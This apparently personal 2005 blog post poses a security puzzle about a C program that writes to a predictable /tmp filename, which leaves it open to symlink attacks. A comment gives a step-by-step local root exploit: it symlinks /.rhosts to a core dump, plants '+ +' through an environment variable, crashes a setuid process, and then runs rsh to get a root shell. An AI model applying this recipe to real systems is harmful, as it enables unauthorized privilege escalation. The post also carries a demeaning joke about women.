Friday, April 15, 2005

The temporary one!

void main()
{
FILE *fh = fopen("/tmp/ABC_my_junk_spot", "w+");
fprintf(fh, "hello..what are you looking at?");
fclose(fh);
}

Find out what is wrong with this piece of code?
How would you exploit this to gain root access if this code runs as root?

PS: The bar girls are like /tmp because
1. They are public property 2.They talk too much

4 comments:

SG said...
This comment has been removed by a blog administrator.
SG said...

Very true.
It may be a local compromise but not a remote one.

--Alpha0

SG said...

I dont think we can control the behavior of printf.

You remember an old trick:
(Earlier all cores dumped by applications having suid as root were owned by root.)

$ln -s /.rhosts core
$BOB42="

+ +

"
$export BOB42

Now get the core dumped by killing some suid root process for example 'ping'.
And here is your chocolate:
$rsh -l root localhost /bin/sh -i

Njoy.

SG said...

In the similar manner you can exploit the code given in problem.